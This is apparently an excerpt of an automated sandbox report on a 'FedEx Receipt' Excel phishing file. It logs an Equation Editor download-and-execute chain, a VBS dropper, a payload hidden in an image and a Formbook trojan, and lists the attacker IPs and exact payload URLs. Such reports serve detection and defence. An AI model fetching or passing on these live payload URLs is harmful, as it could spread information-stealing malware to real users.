            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
            Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
            Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
            Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443

            Networking

            barindex
            Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 41.216.183.13:80 -> 192.168.2.22:49175
            Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 41.216.183.13 80Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,7_2_036407AB
            Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /88077/BNNJ.txt HTTP/1.1Host: 23.95.235.16Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 194.163.41.117 194.163.41.117
            Source: Joe Sandbox ViewIP Address: 23.95.235.16 23.95.235.16
            Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: global trafficHTTP traffic detected: GET /BrlcB HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ilang.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /88077/ima/ima.imim.im.imim.doC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13
            Source: unknownHTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49176 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49179 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,7_2_036407AB
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B654C9D0.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /BrlcB HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ilang.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /88077/ima/ima.imim.im.imim.doC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13
            Source: global trafficHTTP traffic detected: GET /88077/BNNJ.txt HTTP/1.1Host: 23.95.235.16Connection: Keep-Alive
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: ilang.in
            Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
            Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16
            Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16/88077/BNNJ.txt
            Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16/88077/BNP
            Source: EQNEDT32.EXE, 00000007.00000002.455223892.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gif
            Source: EQNEDT32.EXE, 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gifj
            Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.24
            Source: wscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.13/Users_API/syscore/file_B
            Source: wscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481376582.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481166475.00000000004AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481370525.000000000049F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481299140.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, magesofrosepetelflowerstogetitgrea.vBS.7.dr, imagesofrosepetelflowerstogetitgreat[1].gif.7.drString found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txt
            Source: wscript.exe, 00000009.00000003.480557490.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481408431.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481147687.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481281597.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481123191.00000000004D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtr
            Source: wscript.exe, 00000009.00000003.480862214.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.480557490.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481272894.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481430080.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtz
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: ilang.in.url.4.drString found in binary or memory: http://ilang.in/
            Source: FedEx Receipt_53065724643.xls, BrlcB.url.4.drString found in binary or memory: http://ilang.in/BrlcB
            Source: B9930000.0.dr, ~DF189859C23F2234A3.TMP.0.drString found in binary or memory: http://ilang.in/BrlcByX
            Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: powershell.exe, 0000000A.00000002.474007800.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
            Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
            Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4;
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
